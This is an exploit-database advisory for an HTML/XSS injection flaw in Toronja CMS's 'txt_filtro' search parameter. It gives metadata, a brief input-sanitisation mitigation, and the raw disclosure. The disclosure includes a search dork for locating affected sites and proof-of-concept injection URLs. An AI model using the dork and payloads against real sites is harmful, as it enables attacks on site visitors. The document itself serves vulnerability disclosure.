Toronja Cms HTML/XSS Injection Vulnerability

vendor:

Toronja CMS

by:

CoBRa_21

7,5

CVSS

HIGH

HTML/XSS Injection

CWE

Product Name: Toronja CMS

Affected Version From: N/A

Affected Version To: N/A

Patch Exists: NO

Related CWE: N/A

CPE: N/A

Metasploit: N/A

Other Scripts: N/A

Tags: N/A

CVSS Metrics: N/A

Nuclei References: N/A

Nuclei Metadata: N/A

Platforms Tested: N/A

2020

Toronja Cms HTML/XSS Injection Vulnerability

Toronja CMS is vulnerable to HTML/XSS Injection. An attacker can inject malicious HTML/XSS code into the 'txt_filtro' parameter of the 'index.php' page. This can be exploited to execute arbitrary HTML/XSS code in a user's browser session in context of an affected site.

Mitigation:

Input validation should be used to ensure that user-supplied data is properly sanitized and filtered before being used in the application.

Source

Exploit-DB raw data:

-------------------------------------------------------------------------------------------

Toronja Cms HTML/XSS Injection Vulnerability
 
-------------------------------------------------------------------------------------------
 
Author : CoBRa_21

Script Home : http://www.toronja.com.pe/

Dork : intext:"sitio web diseñado por www.toronja.com.pe"

-------------------------------------------------------------------------------------------

HTML Injection:

http://localhost/[path]/index.php?plantilla=busqueda&txt_filtro=<font size=15 color=green>CoBRa_21</font>HTML

-------------------------------------------------------------------------------------------

XSS Injection:

http://localhost/[path]/index.php?plantilla=busqueda&txt_filtro=XSS

-------------------------------------------------------------------------------------------